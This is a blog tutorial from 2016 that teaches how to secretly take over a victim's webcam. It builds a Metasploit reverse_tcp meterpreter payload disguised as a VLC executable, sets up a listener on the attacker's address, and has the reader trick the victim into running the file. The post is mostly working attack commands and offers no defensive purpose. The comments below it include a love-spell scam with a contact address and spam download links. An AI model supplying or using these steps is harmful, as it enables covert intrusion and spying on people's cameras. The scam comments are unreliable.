Friday, June 17, 2016

HOW TO HACK ANY WEB CAM OF REMOTE COMPUTER WITH KALI LINUX

HOW TO HACK ANY WEB CAM OF REMOTE COMPUTER

Hello guys in this tutorial you will learn how to hack any Web Cam of remote Computer. As I think many of the user definitely wants to know about how to hack of the WebCam of remote Computer. So my friends in tutorial you definitely find your ans. In this tutorial what I can do I am using a backtrack as an attacker System to create a Payload and send this Payload to the Victim which is Windows7. Now it demo time how these work..
Note :- This Payload works on windows 2000, XP, Vista, Win 7.
Step 1 :- First open terminal in linux and write the following codes to create a Payload.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.128 R | msfencode -t exe -c 15 >vlc.rxe
By Performing above Step our Payload is successfully encoded and creates in root directory of backtrack.
Step 2 :- Now we used to open a msfconsole for that go to..
Applications – BackTrack – Exploitation Tools – Network Exploitation Tools – Metasploit Framework –
msfconsole
Step 3 :- Now the msfconsole is open in front of you then at that console we set some basic command.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
(here “PAYLOAD” means the code or exploit which is actually runs on the victim machine after exploitation is successfully works and “windows” is represent the victim machine and“meterpreter” is used to open the meterpreter session of windows and “reverse_tcp” is use to connect back to attacker machine to victim machine)
set LHOST 192.168.1.128 (this is a ip address of attacker machine i.e the
ip of my backtrack, you can use ifconfig command to view the ip address of backtrack)
set LPORT 4444 (this is a local port where the victim system connect back to the attacker system)
exploit

Step 4 :- In  our exploit is running successfully and wait for the victim. Now we copy that exploit and send to the victim and request him/her to click/open the exploit.

After clicking the vlc.exe exploit on victim system, then we successfully got a meterpreter sessions opened.
Now its time to do hack a webcam of remote system by using webcam command.
Step 5 :- run webcam
After running above command the webcam of the victim machine is now start to run, to view thewebcam snap of
victim go to root directory of backtrack and open a webcam.htm file and continue press refresh button or F5.

4 comments:

  1. I really like your content it is really very inspiring for me. Thanks for such a nice post. Keep sharing more with us galactictopreviewer

    ReplyDelete
    Replies
    1. Greetings to every one that is reading this testimony. I had been rejected by my husband after five(5) years of marriage just because another woman had cast a spell on him and he left me with 2 kids to suffer. One day when i was reading through the web, i saw a post on how he help a woman to get back her husband and i gave him a chance he told me that my husband is under spell, he said that he will help me and after 7 days that i will have my husband back. i believed he and today i am glad to let you all know that this spell caster has the power to bring lovers back now my husband is back with after 7 days . he also gave me a financial magic ring to boost my business and removed bad luck. i am now happy with my husband. Thanks you Dr. love please contact him at (lovespelldoctor0@gmail. com)

      Delete
    2. How To Hack Any Web Cam Of Remote Computer With Kali Linux ~ Hacking Tutorials >>>>> Download Now

      >>>>> Download Full

      How To Hack Any Web Cam Of Remote Computer With Kali Linux ~ Hacking Tutorials >>>>> Download LINK

      >>>>> Download Now

      How To Hack Any Web Cam Of Remote Computer With Kali Linux ~ Hacking Tutorials >>>>> Download Full

      >>>>> Download LINK 2R

      Delete
  2. Thank you because you have been willing to share information with us. we will always appreciate all you have done here because I know you are very concerned with our. Check here for more

    ReplyDelete